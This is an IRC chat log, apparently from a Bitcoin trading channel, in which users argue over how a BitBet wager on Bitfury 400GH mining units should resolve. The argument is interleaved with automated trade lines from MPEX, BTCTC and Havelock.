00:30:14 [MPEX] [S.MPOE] 1 @ 0.00087099 BTC [-] Sep 01 00:30:15 each unit includes enough stuff to make 400gh Sep 01 00:30:28 [MPEX] [S.MPOE] 1 @ 0.00087099 BTC [-] Sep 01 00:30:28 that's the debate anduck.. Sep 01 00:30:37 and to answer that there is not enough info in the bet.. Sep 01 00:30:38 Anduck: the post you're using to prove your point disagrees with you. He says "Some info and pictures of my units: 400GH unit and 25GH unit." Sep 01 00:30:47 [MPEX] [S.MPOE] 1 @ 0.00087099 BTC [-] Sep 01 00:30:57 tyrion70: when the bet talks about unit (25gh and 400gh) it means the kits you can buy from shop (25gh and 400gh), isn't that very clear? Sep 01 00:31:04 i am not proving a point Sep 01 00:31:06 [MPEX] [S.MPOE] 1 @ 0.00087099 BTC [-] Sep 01 00:31:19 i am trying to make the bet to resolve correctly Sep 01 00:31:28 anduck, yes which would mean that one would have to visit their site in order to see what a "unit" is.. Sep 01 00:31:33 [MPEX] [S.MPOE] 1 @ 0.00087099 BTC [-] Sep 01 00:31:55 then at the site one would see that a kit containts 1 m board and 16 h boards.. Sep 01 00:32:07 tyrion70: so there's no info about what hardware the unit has? though it's not important, only the hashrate and efficiency is Sep 01 00:32:21 then the bet would always be yes.......... Sep 01 00:32:36 could.. Sep 01 00:32:48 like I said.. Sep 01 00:32:50 Anduck: tyrion70 is explaining exactly why people can technically read the bet different to others.... you have to at least realize this Sep 01 00:33:01 what the site says about the performance: Sep 01 00:33:01 Performance: Sep 01 00:33:02 400GHash/s Sep 01 00:33:02 Total power draw max. 400W (Efficiency at wall depends on your PSU) Sep 01 00:33:07 of KnC would ship two boxes for a jupiter.. Sep 01 00:33:14 it would not be one unit right?? Sep 01 00:33:29 tyrion70: bfsb boards werent sold in boxes Sep 01 00:33:31 Anduck: which includes "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips " Sep 01 00:33:32 even if it hashed at 400gh/1kw Sep 01 00:33:33 they were sold as cards and boards Sep 01 00:33:39 and those formed in as units Sep 01 00:33:47 Anduck: A unit is whatever fits on 1 M-board Sep 01 00:33:50 units that are same as kits as we talked earlier Sep 01 00:33:53 fractal: no! lol Sep 01 00:34:00 what definition is that?? Sep 01 00:34:00 yeah so you could read a unit as 1 m board and 16 h boards.. Sep 01 00:34:09 Anduck: any rational person would come to that conclusion. Sep 01 00:34:17 tyrion70: can you also read that a unit is 1 m-board and 1 h-board? Sep 01 00:34:23 yes Sep 01 00:34:25 no, they're KITS that are built from boards and cards Sep 01 00:34:35 the kit is same thing is a unit - as we talked earlier Sep 01 00:34:36 Anduck: BUT the website says that KIT is "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips " Sep 01 00:34:44 fractal: yes it does. and it changed Sep 01 00:34:46 i wonder if this discussion has hashed worth a block by now. Sep 01 00:34:48 but the performance did not Sep 01 00:34:52 exactly.. Sep 01 00:34:55 the bet wasnt about chip count Sep 01 00:34:58 it was about performance Sep 01 00:34:59 it changed.. so it invalidates the bet.. Sep 01 00:35:15 Bets can indeed be cancelled, but only if BitBet judges that material changes make the bet meaningless. Sep 01 00:35:17 the 25gh and 400gh units performance. both units got chips added but the performance promise is met Sep 01 00:35:20 quote from bbet Sep 01 00:35:56 the bet was talking about "a unit"... Sep 01 00:35:59 Anduck: the 400GH 'UNIT' does infact only hash at 365-380Gh. Sep 01 00:36:10 and "a unit" changed during the course of the bet correct anduck? Sep 01 00:36:14 even genesisblock calls it a UNIT.. 16 h-bards on 1 m-board Sep 01 00:36:17 1 m-board with 256 chips does that. Sep 01 00:36:33 tyrion70: unit is the kit. we already talked about this. it's the only way to understand it as thats the only thing defined Sep 01 00:36:46 and they changed the kit correct? Sep 01 00:36:47 when the bet talks about unit, it means the kit Sep 01 00:36:51 yes Sep 01 00:36:53 they changed the kit Sep 01 00:37:00 they changed the unit Sep 01 00:37:00 exactly.. Sep 01 00:37:00 mircea_popescu: it's more of a loop of same input again and again Sep 01 00:37:02 thats same thing Sep 01 00:37:04 they changed it, true Sep 01 00:37:09 so it invalidates the bet.. Sep 01 00:37:10 but the PERFORMANCE is still the same Sep 01 00:37:13 no it does not Sep 01 00:37:25 that depends on how you see a unit anduck... Sep 01 00:37:37 and by changing the definition of a kit they changed the perspective.. Sep 01 00:37:42 if unit===kit, kit gets more chips added === unit gets more chips added Sep 01 00:37:58 the unit must mean the kit since thats what's defined Sep 01 00:38:03 thus invalidating the bet.. Sep 01 00:38:16 and it's the logical way. the other way would be to think that 1 unit is 1 full m-board. but thats not how it's defined Sep 01 00:38:32 Performance is only 1 aspect of the bet -- there are many conditions. 1) it has to ship by sept 1 - yes 2) 5 people have to post it on forums - yes 3) the 400Gh 'UNIT' as defined at the time of writing should hash at 400Gh. - no. Sep 01 00:38:32 it isn't defined at all.. Sep 01 00:38:40 since there's no such thing as unit defined.. but the kit is defined at bfsb.com Sep 01 00:38:58 yes so one could argue that a unit == kit ==256 chips.. Sep 01 00:39:13 Anduck: any rational person would assume the 400Gh unit to be a KIT as defined on the BFSB.com website. Sep 01 00:39:15 and now they changed it to ~300 chips.. Sep 01 00:39:25 [BTCTC] [ACTIVEMINING] 37 @ 0.004135 = 0.153 BTC [-] Sep 01 00:39:27 [BTCTC] [ACTIVEMINING] 113 @ 0.004134 = 0.4671 BTC [-] Sep 01 00:39:33 Anduck: If they never shipped a 'UNIT' then I guess the bet is invalid, since they only shipped 'KITS'? Sep 01 00:40:08 the unit is the same thing as kit. the bet says "25 gh and 400gh unit" and bitfurystrikesback sells 25gh kit and 400gh kit so you can pretty much say those are the same Sep 01 00:40:16 do you disagree? Sep 01 00:40:20 we already talked about this earlier Sep 01 00:40:33 OK, and a 400Gh unit, according to the Genesisbloack, and MXRider is defined at 1 M-board and 16 H-cards Sep 01 00:40:38 yes but you only remember half of what I said there apparently anduck.. Sep 01 00:40:39 and it only does 365gh Sep 01 00:40:57 tyrion70: yeah, unit==kit==256 chips but it got changed to ~300 chips. but it maintained the promised performance Sep 01 00:41:08 tyrion70: i remember the conclusion Sep 01 00:41:10 that depends on your viewpoint anduck.. Sep 01 00:41:27 you add $ to the equasion... Sep 01 00:41:38 hmm? Sep 01 00:41:46 people didn't need to pay for the hardware change of the unit Sep 01 00:41:48 it's a silent dollar but its there.. Sep 01 00:41:57 Anduck: don't you think if NO bettors bet based on one definition of UNIT, and then the definition of a UNIT changed, then it's disingenuous to people who bet no? Sep 01 00:42:00 wait Sep 01 00:42:03 lemme explain this.. Sep 01 00:42:14 if you would have had to pay more for this board... Sep 01 00:42:17 how did it change fractal? Sep 01 00:42:21 unit refers to the 400gh kit, right Sep 01 00:42:23 would you still think its a yes anduck? Sep 01 00:42:26 [BTCTC] [PETA-MINE] 1 @ 0.6499 BTC [-] Sep 01 00:42:26 tyrion70: yes Sep 01 00:42:27 Anduck: 1 UNIT is "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips " Sep 01 00:42:31 tyrion70: o i mean no Sep 01 00:42:35 ok Sep 01 00:42:41 so you added a variable to the bet.. Sep 01 00:42:43 if i had to pay more, it would definately be a no Sep 01 00:42:43 $.. Sep 01 00:42:49 what? Sep 01 00:42:51 but that $ is not in the bet.. Sep 01 00:43:05 fractal: 1 unit is 1 kit Sep 01 00:43:09 your viewpoint is in dollars.. Sep 01 00:43:12 [BTCTC] [PETA-MINE] 2 @ 0.6499 = 1.2998 BTC [-] Sep 01 00:43:21 fractals viewpoint is in chips.. Sep 01 00:43:24 the bet was about kit performance. Sep 01 00:43:30 the performance of the kit is as promised Sep 01 00:43:34 what's unclear? Sep 01 00:43:45 well why would it be a no if they asked for 100$? Sep 01 00:43:49 that someone think unit is strictly 256 chips as they said? Sep 01 00:43:50 on what grounds? Sep 01 00:43:57 In my view as well, getting more hardware is the same as if the manufacturer missed performance, let them keep the 365Gh UNIT, and offered a $ refund. Sep 01 00:44:08 tyrion70: why are you adding this money variable here since it's totally irrelevant Sep 01 00:44:28 its relevant because you don't recognize it as being a variable.. Sep 01 00:44:30 but the customer orders 400ghash unit, gets the 400ghash unit, whats the missed performance then? Sep 01 00:44:53 Anduck: But they didn't get a 400Gh unit. they got a 365Gh unit. Sep 01 00:44:56 customer pays 15000 usd for the 400ghash unit and gets 400 ghash unit for that 15000 usd Sep 01 00:44:58 what I mean to say is that you look at it from a dollar perspective.. Sep 01 00:45:09 yes Sep 01 00:45:10 fractal: every customer who bought 400gh unit will or did already get 400gh unit. Sep 01 00:45:27 the unit just includes more chips than what was promised Sep 01 00:45:28 and fractal payed for a 256 chip 400ghash unit and gets 400 ghash with 300 chips... Sep 01 00:45:49 that's a different viewpoint.. Sep 01 00:46:00 and both chipcount and dollars are not in the bet description.. Sep 01 00:46:09 hence they are both valid or invalid.. Sep 01 00:46:11 but he gets what he paid for, performance wise, right? the bet was only about performance, not about the hardware of the unit Sep 01 00:46:38 ok why can't he disagree on 30 more chips.. and you can disagree on 30 more $?? Sep 01 00:46:42 what's the difference? Sep 01 00:46:46 Anduck: But the definition of a unit , as advertised by bsfb.com, was "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips " -- and it is not 400Gh Sep 01 00:46:48 tyrion70: there's only performance requirement for the kit. 400gh kit must do 400gh at <400W Sep 01 00:46:56 Anduck: thats not what the bet says Sep 01 00:46:59 fractal: thats the definition yes and it chanegd Sep 01 00:47:03 you just said, if you had to pay more it was a no right? Sep 01 00:47:04 it totally changed, so what? Sep 01 00:47:39 So what is that its not fair to NO betters who based their bets on the definition of a UNIT as advertsied at the time of writing the bet. Sep 01 00:47:48 interestingly enough, the bet doesnt even mention asic chips. Sep 01 00:47:58 because the bet doesn't address the unit hardware, only the unit performance!!! Sep 01 00:48:05 indeed Sep 01 00:48:10 And the performance of the UNIT was not 400Gh Sep 01 00:48:11 anduck.. Sep 01 00:48:12 they could've shipped GPU's worth of 400 ghash Sep 01 00:48:13 it was 365Gh Sep 01 00:48:16 if it only mentions performance.. Sep 01 00:48:29 why would the bet be a no if you had to pay 30$ more? Sep 01 00:48:31 but too bad 400 gigahash of GPU's would draw more than >400W so the performance requirement wouldnt be met Sep 01 00:48:34 ok, i'll remove the chip count from the description... and add 1-raspberry pi Sep 01 00:48:49 tyrion70: "Bitfury EU August orders" Sep 01 00:48:58 when you pay for your order, it's an order Sep 01 00:49:09 if you get an option to buy something more, it's a different order Sep 01 00:49:10 where does it state how much it should cost? Sep 01 00:49:28 1 UNIT is, as advertised - "1 Master board. 16 hashing boards. 1 Raspberry Pi Model B" Sep 01 00:49:30 in the bet.. Sep 01 00:49:52 fractal: and that changed to more hardware, performance of the unit is still kept as promised Sep 01 00:50:08 Anduck: No, performance of the UNIT as defined in the bet is 365Gh Sep 01 00:50:08 you can't talk about 1 unit to be that since there was a different unit/kit available too Sep 01 00:50:23 ok Sep 01 00:50:24 they didnt define chips or hardware in the bet Sep 01 00:50:25 Anduck: the bet specifically mentions the 400Gh unit. Sep 01 00:50:30 anduck.. Sep 01 00:50:33 what if.. Sep 01 00:50:41 bitfury.. instead of giving more hardware... Sep 01 00:50:45 bitfurystrikesback.com product description of the 400gh unit: Sep 01 00:50:45 Performance: Sep 01 00:50:46 400GHash/s Sep 01 00:50:46 Total power draw max. 400W (Efficiency at wall depends on your PSU) Sep 01 00:50:52 INCLUDES:- "1 Master board. 16 hashing boards. 1 Raspberry Pi Model B" Sep 01 00:50:58 gave you a 1-m and 16h board with 200$? Sep 01 00:51:07 would it be a no? Sep 01 00:51:12 tyrion70: it wouldn't produce 400gh so no Sep 01 00:51:58 but the bet addresses performance only, not chip amount Sep 01 00:52:08 Anduck: the 400Gh unit doesn't produce 400Gh... it produces 365Gh..... the extra hardware is shipped to make up for performance misses..... its VERY GOOD PR and means bitfury is a great company, but it also means not all condiitons of the bet were met. Sep 01 00:52:25 one orders 400gh, he gets 400gh. it performs 400gh. Sep 01 00:52:41 isn't that kind of weird anduck? Sep 01 00:52:54 no? Sep 01 00:53:07 the performance of the machine should stay the same Sep 01 00:53:13 Anduck: thats right.... nobody is disagreeing with that. We're talking about the bet language which defines a UNIT as as advertised - "1 Master board. 16 hashing boards. 1 Raspberry Pi Model B" -- this is 365Gh Sep 01 00:53:22 I'd expect a unit to have a performance.. Sep 01 00:53:29 it does define the unit to be 400gh unit or 25gh unit Sep 01 00:53:35 it doesnt address the hardware the unit includes Sep 01 00:53:50 it only addresses the PERFORMANCE of the unit Sep 01 00:53:56 Anduck: yes it does. bfsb.com says the hardware unit is "as advertised - "1 Master board. 16 hashing boards. 1 Raspberry Pi Model B"" Sep 01 00:54:02 only the performance must be met, nothing about hardware itself Sep 01 00:54:14 ok but it means that bitfury can influence the outcome of the bet with a technicality.. Sep 01 00:54:15 fractal: yeah but thats not the performance promise lol Sep 01 00:54:25 a UNIT has to have performance. and the definition of the UNIT is what bfsb.com says -as advertised - "1 Master board. 16 hashing boards. 1 Raspberry Pi Model B" Sep 01 00:54:27 tyrion70: how so? Sep 01 00:54:34 [BTCTC] [TAT.ASICMINER] 5 @ 0.024 = 0.12 BTC [+] Sep 01 00:54:51 bitfurystrikesback defines their 400gh kit performance this way: Sep 01 00:54:52 Performance: Sep 01 00:54:52 400GHash/s Sep 01 00:54:53 Total power draw max. 400W (Efficiency at wall depends on your PSU) Sep 01 00:54:58 that is what the bet talks about, right? Sep 01 00:54:59 well.. if they bet on Yes they would fix that with this solution.. whilst not improving the hardware itself.. Sep 01 00:55:15 For a UNIT to have performance, there has to be a UNIT that someone can speak of .... the UNIT is question is " "1 Master board. 16 hashing boards. 1 Raspberry Pi Model B" Sep 01 00:55:34 tyrion70: they could do whatever they want, add or remove the hardware. think about that what if 1 h-card produced 50 ghash Sep 01 00:55:47 [BTCTC] [TAT.ASICMINER] 5 @ 0.024 = 0.12 BTC [+] Sep 01 00:55:48 would they ship 16 h-cards as promised for 400gh unit? Sep 01 00:55:54 no, they would ship 400gh worth of h-cards Sep 01 00:56:04 Anduck: then the bet would be a yes. it would over-perform. Sep 01 00:56:09 well if I ordered them and I cleared shelves in my rack I'd be very sad if they were 10 times as large as advertized... Sep 01 00:56:19 which would only make it 8 h-cards. the customer buys 400gh unit. 400gh unit produces 400gh Sep 01 00:56:22 From my viewpoint they would not meet performance.. Sep 01 00:56:24 [BTCTC] [TAT.ASICMINER] 3 @ 0.024 = 0.072 BTC [+] Sep 01 00:57:41 it's not really relevant does the kit include 10000 chips or 10 chips to make the 400gh unit hash that 400gh. the requirement in the bet was that 400gh unit hashes 400gh at <400W Sep 01 00:57:54 and that is met. Sep 01 00:58:19 they changed the definition of a unit halfway the bet.. Sep 01 00:58:25 how? Sep 01 00:58:36 the unit is 400gh unit. unit produces 400gh < 400W Sep 01 00:58:37 by making it larger.. Sep 01 00:58:39 yeah Sep 01 00:58:43 but performance didnt change Sep 01 00:58:46 [BTCTC] [B.YABMC] 10 @ 0.00179 = 0.0179 BTC [-] Sep 01 00:58:49 the bet was only about performance, not about sizee Sep 01 00:59:13 but apparently it was about dollars.. Sep 01 00:59:13 Anduck: The bet says performance for a 400Gh UNIT. Sep 01 00:59:20 the definition of a UNIT here is very important. Sep 01 00:59:29 cuz if you had to pay more it would have been a no.. Sep 01 00:59:42 you've been talking about this for more than an hour Sep 01 00:59:50 [BTCTC] [TAT.VIRTUALMINE] 12 @ 0.0007016 = 0.0084 BTC [-] Sep 01 00:59:50 weve talked about this for about 6-7 hours Sep 01 01:00:10 stop talking then, it's clearly going nowhere Sep 01 01:00:18 the bet doesnt require certain chip amount, only performance promise must be met Sep 01 01:00:20 yups Sep 01 01:00:21 only 2,5 hours to go :p Sep 01 01:00:34 2 hours now! Sep 01 01:00:37 :) Sep 01 01:00:39 [BTCTC] [LABCOIN] 565 @ 0.00362 = 2.0453 BTC [-] Sep 01 01:00:40 [BTCTC] [LABCOIN] 25 @ 0.00362 = 0.0905 BTC [-] Sep 01 01:00:42 [BTCTC] [LABCOIN] 410 @ 0.003619 = 1.4838 BTC [-] Sep 01 01:00:44 saulimus is right.... I'll unilaterally stop discussion for a while. so I can regain my sanity. Sep 01 01:00:58 we'll see what they decide.. Sep 01 01:01:01 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0007015 = 0.0702 BTC [-] Sep 01 01:01:03 [BTCTC] [TAT.ASICMINER] 4 @ 0.024 = 0.096 BTC [+] Sep 01 01:01:04 [BTCTC] [TAT.VIRTUALMINE] 13 @ 0.0007004 = 0.0091 BTC [-] Sep 01 01:01:07 glad i didn't bet :p Sep 01 01:01:23 [BTCTC] [TAT.ASICMINER] 2 @ 0.024 = 0.048 BTC [+] Sep 01 01:01:25 [BTCTC] [ACTIVEMINING] 12 @ 0.004131 = 0.0496 BTC [-] Sep 01 01:01:26 [BTCTC] [TAT.VIRTUALMINE] 475 @ 0.0007002 = 0.3326 BTC [-] Sep 01 01:01:29 [BTCTC] [ACTIVEMINING] 50 @ 0.00413 = 0.2065 BTC [-] Sep 01 01:01:30 [BTCTC] [ACTIVEMINING] 137 @ 0.004122 = 0.5647 BTC [-] Sep 01 01:01:31 [BTCTC] [ACTIVEMINING] 34 @ 0.004118 = 0.14 BTC [-] Sep 01 01:01:32 [BTCTC] [ACTIVEMINING] 250 @ 0.00411 = 1.0275 BTC [-] Sep 01 01:01:33 [BTCTC] [ACTIVEMINING] 17 @ 0.004109 = 0.0699 BTC [-] Sep 01 01:01:46 I think this is a serious discussion to have If i were bitbet.... its clear they shipped on time and are a great company .... but the language of the bet here -- specifically what a 'UNIT' is defined as-- is very important. Sep 01 01:01:55 I hope they dont decide without a long discussion Sep 01 01:02:58 [BTCTC] [PETA-MINE] 2 @ 0.6499 = 1.2998 BTC [-] Sep 01 01:03:10 [BTCTC] [DMS.MINING] 55 @ 0.003374 = 0.1856 BTC [-] Sep 01 01:03:23 :) Sep 01 01:03:30 be back later... Sep 01 01:03:37 my fingers hurt ;) Sep 01 01:03:50 [BTCTC] [LABCOIN] 96 @ 0.00362 = 0.3475 BTC [+] Sep 01 01:03:51 [BTCTC] [LABCOIN] 385 @ 0.003617 = 1.3925 BTC [-] Sep 01 01:03:53 [BTCTC] [LABCOIN] 450 @ 0.003617 = 1.6277 BTC [-] Sep 01 01:03:54 [BTCTC] [LABCOIN] 199 @ 0.003615 = 0.7194 BTC [-] Sep 01 01:03:54 [BTCTC] [LABCOIN] 72 @ 0.003612 = 0.2601 BTC [-] Sep 01 01:03:55 [BTCTC] [LABCOIN] 1200 @ 0.003611 = 4.3332 BTC [-] Sep 01 01:03:56 [BTCTC] [LABCOIN] 1100 @ 0.00361 = 3.971 BTC [-] Sep 01 01:03:58 [BTCTC] [LABCOIN] 815 @ 0.003607 = 2.9397 BTC [-] Sep 01 01:03:59 [BTCTC] [LABCOIN] 150 @ 0.003601 = 0.5402 BTC [-] Sep 01 01:04:00 [BTCTC] [LABCOIN] 2000 @ 0.003601 = 7.202 BTC [-] Sep 01 01:04:01 [BTCTC] [LABCOIN] 1000 @ 0.0036 = 3.6 BTC [-] Sep 01 01:04:02 [BTCTC] [LABCOIN] 300 @ 0.0036 = 1.08 BTC [-] Sep 01 01:04:03 [BTCTC] [DMS.MINING] 69 @ 0.003375 = 0.2329 BTC [+] Sep 01 01:04:04 [BTCTC] [LABCOIN] 450 @ 0.0036 = 1.62 BTC [-] Sep 01 01:04:22 ciao Sep 01 01:04:50 [BTCTC] [PETA-MINE] 2 @ 0.65 = 1.3 BTC [+] Sep 01 01:05:14 [BTCTC] [ASICMINER-PT] 2 @ 2.471 = 4.942 BTC [+] Sep 01 01:05:28 [BTCTC] [ACTIVEMINING] 59 @ 0.00412 = 0.2431 BTC [+] Sep 01 01:05:44 [BTCTC] [ASICMINER-PT] 5 @ 2.47 = 12.35 BTC [-] Sep 01 01:05:57 [BTCTC] [LABCOIN] 24 @ 0.003573 = 0.0858 BTC [-] Sep 01 01:05:58 [BTCTC] [LABCOIN] 347 @ 0.003571 = 1.2391 BTC [-] Sep 01 01:06:00 [BTCTC] [LABCOIN] 100 @ 0.003569 = 0.3569 BTC [-] Sep 01 01:06:01 [BTCTC] [LABCOIN] 100 @ 0.003566 = 0.3566 BTC [-] Sep 01 01:06:02 [BTCTC] [LABCOIN] 600 @ 0.003557 = 2.1342 BTC [-] Sep 01 01:06:03 [BTCTC] [LABCOIN] 35 @ 0.003557 = 0.1245 BTC [-] Sep 01 01:06:09 [BTCTC] [LABCOIN] 200 @ 0.003556 = 0.7112 BTC [-] Sep 01 01:06:10 [BTCTC] [LABCOIN] 347 @ 0.003556 = 1.2339 BTC [-] Sep 01 01:06:27 [BTCTC] [LABCOIN] 200 @ 0.003556 = 0.7112 BTC [-] Sep 01 01:06:29 [BTCTC] [LABCOIN] 65 @ 0.0036 = 0.234 BTC [+] Sep 01 01:06:47 [BTCTC] [ACTIVEMINING] 14 @ 0.004121 = 0.0577 BTC [+] Sep 01 01:07:00 [BTCTC] [LABCOIN] 174 @ 0.003557 = 0.6189 BTC [-] Sep 01 01:07:12 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [-] Sep 01 01:07:24 PETA-MINE worth it? Sep 01 01:07:37 [BTCTC] [PETA-MINE] 1 @ 0.65 BTC [+] Sep 01 01:07:46 [BTCTC] [ACTIVEMINING] 1 @ 0.004121 BTC [+] Sep 01 01:08:25 Lomus yes, no animals harmed Sep 01 01:08:35 [BTCTC] [ASICMINER-PT] 1 @ 2.468 BTC [-] Sep 01 01:08:37 [BTCTC] [ASICMINER-PT] 1 @ 2.466 BTC [-] Sep 01 01:08:37 [BTCTC] [ASICMINER-PT] 3 @ 2.466 = 7.398 BTC [-] Sep 01 01:08:38 [BTCTC] [ASICMINER-PT] 2 @ 2.464 = 4.928 BTC [-] Sep 01 01:08:39 jkjk Sep 01 01:08:39 [BTCTC] [ASICMINER-PT] 1 @ 2.454 BTC [-] Sep 01 01:08:40 [BTCTC] [ASICMINER-PT] 2 @ 2.453 = 4.906 BTC [-] Sep 01 01:08:41 [BTCTC] [ASICMINER-PT] 10 @ 2.453 = 24.53 BTC [-] Sep 01 01:08:42 [BTCTC] [ASICMINER-PT] 1 @ 2.452 BTC [-] Sep 01 01:08:43 ll Sep 01 01:08:43 [BTCTC] [ASICMINER-PT] 3 @ 2.452 = 7.356 BTC [-] Sep 01 01:08:44 [BTCTC] [ASICMINER-PT] 1 @ 2.451 BTC [-] Sep 01 01:08:45 [BTCTC] [ASICMINER-PT] 20 @ 2.451 = 49.02 BTC [-] Sep 01 01:08:46 [BTCTC] [ASICMINER-PT] 1 @ 2.451 BTC [-] Sep 01 01:08:47 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [-] Sep 01 01:08:47 [BTCTC] [ASICMINER-PT] 4 @ 2.45 = 9.8 BTC [-] Sep 01 01:08:48 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [-] Sep 01 01:08:49 [BTCTC] [ASICMINER-PT] 2 @ 2.45 = 4.9 BTC [-] Sep 01 01:08:53 deposits flushed Sep 01 01:08:53 [BTCTC] [ACTIVEMINING] 28 @ 0.004114 = 0.1152 BTC [-] Sep 01 01:08:55 [BTCTC] [ACTIVEMINING] 113 @ 0.004114 = 0.4649 BTC [-] Sep 01 01:08:57 [BTCTC] [ACTIVEMINING] 108 @ 0.00411 = 0.4439 BTC [-] Sep 01 01:08:58 ^ thestringluller Sep 01 01:08:59 [BTCTC] [ASICMINER-PT] 1 @ 2.448 BTC [-] Sep 01 01:09:00 [HAVELOCK] [AM1] 2 @ 2.44 = 4.88 BTC [-] Sep 01 01:09:03 [HAVELOCK] [AM1] 1 @ 2.44 BTC [-] Sep 01 01:09:06 [HAVELOCK] [AM1] 1 @ 2.42 BTC [-] Sep 01 01:09:21 [BTCTC] [ASICMINER-PT] 12 @ 2.44 = 29.28 BTC [-] Sep 01 01:09:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.0239 BTC [-] Sep 01 01:10:11 [BTCTC] [BFMINES] 10 @ 0.001632 = 0.0163 BTC [-] Sep 01 01:10:33 [BTCTC] [W4A-BOOK] 1 @ 0.1801 BTC [-] Sep 01 01:10:34 [BTCTC] [W4A-BOOK] 10 @ 0.18 = 1.8 BTC [-] Sep 01 01:10:57 does BTCT have a websocket? Sep 01 01:11:04 wheres assbot get its feed? Sep 01 01:11:43 [BTCTC] [PETA-MINE] 3 @ 0.65 = 1.95 BTC [+] Sep 01 01:12:07 it doesn't have a web socket, at least not a public one. even the "realtime" thing is just a page refreshed every other second Sep 01 01:13:19 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0008699 = 0.0017 BTC [+] Sep 01 01:15:41 yeah Sep 01 01:15:43 noticed that Sep 01 01:16:00 so is the easiest way to get a feed to have a ircbot watching assbot? Sep 01 01:17:34 [BTCTC] [TAT.VIRTUALMINE] 12 @ 0.0008699 = 0.0104 BTC [+] Sep 01 01:17:47 Krytotrade.com is neat Sep 01 01:26:28 [HAVELOCK] [AM100] 3 @ 0.024 = 0.072 BTC [-] Sep 01 01:26:32 [HAVELOCK] [AM100] 15 @ 0.024 = 0.36 BTC [-] Sep 01 01:26:35 [HAVELOCK] [AM100] 45 @ 0.024 = 1.08 BTC [-] Sep 01 01:27:14 [BTCTC] [ASICMINER-PT] 1 @ 2.44 BTC [-] Sep 01 01:27:54 [BTCTC] [PETA-MINE] 3 @ 0.65 = 1.95 BTC [+] Sep 01 01:28:09 [BTCTC] [PAJKA.BOND] 3 @ 0.01692 = 0.0508 BTC [+] Sep 01 01:29:42 [BTCTC] [DMS.MINING] 26 @ 0.003375 = 0.0878 BTC [+] Sep 01 01:31:00 [BTCTC] [PETA-MINE] 2 @ 0.65 = 1.3 BTC [+] Sep 01 01:32:34 [BTCTC] [NASTY-PT] 10 @ 0.00325 = 0.0325 BTC [+] Sep 01 01:33:45 [BTCTC] [LABCOIN] 16 @ 0.003599 = 0.0576 BTC [+] Sep 01 01:33:47 [BTCTC] [LABCOIN] 9 @ 0.0036 = 0.0324 BTC [+] Sep 01 01:33:59 [BTCTC] [LABCOIN] 16 @ 0.0036 = 0.0576 BTC [+] Sep 01 01:34:49 [BTCTC] [NASTY-PT] 1 @ 0.00325 BTC [+] Sep 01 01:35:00 who runs assbot? Sep 01 01:36:15 kakobrekla Sep 01 01:36:40 [MPEX] [S.MPOE] 1800 @ 0.00087082 = 1.5675 BTC [-] Sep 01 01:39:51 [BTCTC] [S.MPOE-PT] 70 @ 0.0007803 = 0.0546 BTC [+] Sep 01 01:39:53 [BTCTC] [TAT.ASICMINER] 43 @ 0.024 = 1.032 BTC [+] Sep 01 01:42:53 [BTCTC] [TAT.ASICMINER] 10 @ 0.024 = 0.24 BTC [+] Sep 01 01:47:48 [HAVELOCK] [LABCO] 3 @ 0.0031 = 0.0093 BTC [-] Sep 01 01:48:42 [BTCTC] [ACTIVEMINING] 270 @ 0.00411 = 1.1097 BTC [-] Sep 01 01:48:43 [BTCTC] [ACTIVEMINING] 983 @ 0.004109 = 4.0391 BTC [-] Sep 01 01:48:44 [BTCTC] [ACTIVEMINING] 99 @ 0.004109 = 0.4068 BTC [-] Sep 01 01:48:45 [BTCTC] [ACTIVEMINING] 3 @ 0.004107 = 0.0123 BTC [-] Sep 01 01:48:46 [BTCTC] [ACTIVEMINING] 50 @ 0.004105 = 0.2053 BTC [-] Sep 01 01:48:47 [BTCTC] [ACTIVEMINING] 1183 @ 0.004105 = 4.8562 BTC [-] Sep 01 01:48:49 [BTCTC] [ACTIVEMINING] 1000 @ 0.004104 = 4.104 BTC [-] Sep 01 01:48:50 [BTCTC] [ACTIVEMINING] 128 @ 0.004101 = 0.5249 BTC [-] Sep 01 01:48:51 [BTCTC] [ACTIVEMINING] 190 @ 0.0041 = 0.779 BTC [-] Sep 01 01:48:52 [BTCTC] [ACTIVEMINING] 2500 @ 0.0041 = 10.25 BTC [-] Sep 01 01:48:53 [BTCTC] [ACTIVEMINING] 10 @ 0.0041 = 0.041 BTC [-] Sep 01 01:48:53 [BTCTC] [ACTIVEMINING] 500 @ 0.0041 = 2.05 BTC [-] Sep 01 01:48:54 [BTCTC] [ACTIVEMINING] 711 @ 0.004031 = 2.866 BTC [-] Sep 01 01:48:55 [BTCTC] [ACTIVEMINING] 600 @ 0.00403 = 2.418 BTC [-] Sep 01 01:48:56 [BTCTC] [ACTIVEMINING] 300 @ 0.004025 = 1.2075 BTC [-] Sep 01 01:48:57 [BTCTC] [ACTIVEMINING] 40 @ 0.004025 = 0.161 BTC [-] Sep 01 01:48:58 [BTCTC] [ACTIVEMINING] 200 @ 0.004008 = 0.8016 BTC [-] Sep 01 01:48:59 [BTCTC] [ACTIVEMINING] 250 @ 0.004003 = 1.0008 BTC [-] Sep 01 01:49:01 [BTCTC] [ACTIVEMINING] 5 @ 0.004001 = 0.02 BTC [-] Sep 01 01:49:02 [BTCTC] [ACTIVEMINING] 5000 @ 0.004001 = 20.005 BTC [-] Sep 01 01:49:27 [BTCTC] [DMS.MINING] 3 @ 0.0033 = 0.0099 BTC [-] Sep 01 01:49:29 [BTCTC] [DMS.MINING] 2 @ 0.0033 = 0.0066 BTC [-] Sep 01 01:49:30 [BTCTC] [DMS.MINING] 3 @ 0.0033 = 0.0099 BTC [-] Sep 01 01:49:31 [BTCTC] [DMS.MINING] 340 @ 0.0033 = 1.122 BTC [-] Sep 01 01:50:13 [BTCTC] [DMS.MINING] 1 @ 0.003374 BTC [+] Sep 01 01:51:00 !last btctc dms.selling Sep 01 01:51:01 Last trade for DMS.SELLING on BTCTC was at 0.01285 BTC [+] Sep 01 01:51:05 [BTCTC] [ACTIVEMINING] 99 @ 0.004003 = 0.3963 BTC [+] Sep 01 01:54:52 [BTCTC] [ACTIVEMINING] 26 @ 0.004007 = 0.1042 BTC [+] Sep 01 01:54:53 [BTCTC] 